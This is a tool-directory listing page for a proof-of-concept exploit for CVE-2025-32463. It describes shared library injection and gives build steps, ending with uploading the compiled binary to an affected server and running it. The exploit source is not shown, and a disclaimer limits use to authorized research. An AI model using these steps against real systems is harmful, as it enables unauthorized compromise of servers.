Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-32463_PoC — Proof-of-concept exploit for CVE-2025-32463, demonstrating shared library injection via precompiled payload for immediate execution on affected systems. | Kitploit
Tools/GitHubGitHub/blackcat4347/cve-2025-32463_poc
Vulnerability AnalysisExploitationShellcodeLearning & EducationPayload DevelopmentBinary Exploitation
GitHubblackcat4347/cve-2025-32463_poc

CVE-2025-32463_PoC

Proof-of-concept exploit for CVE-2025-32463, demonstrating shared library injection via precompiled payload for immediate execution on affected systems.

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-32463

NVD CVE-2025-32463
In most cases, GCC is not installed by default on target servers.
This proof of concept provides a precompiled version to ensure it can be executed immediately on affected systems.


Usage

1. Compile the woot1337.c file:

root@kitploit:~
gcc -shared -fPIC -Wl,-init,woot -o libwoot1337.so woot1337.c

2. Convert the .so file into a C array (byte format):

root@kitploit:~
xxd -i libwoot1337.so > libwoot1337.h

3. Compile the cve_2025_32463.c file:

root@kitploit:~
gcc cve_2025_32463.c -o cve_2025_32463

4. Upload to the affected server and grant execution permissions:

root@kitploit:~
chmod +x cve_2025_32463
./cve_2025_32463

Disclaimer

This Proof of Concept (PoC) is provided solely for educational and research purposes. Executing this code on any system without explicit authorization is illegal and unethical. The authors disclaim any responsibility for misuse or damage caused by the use of this material.

Download Tool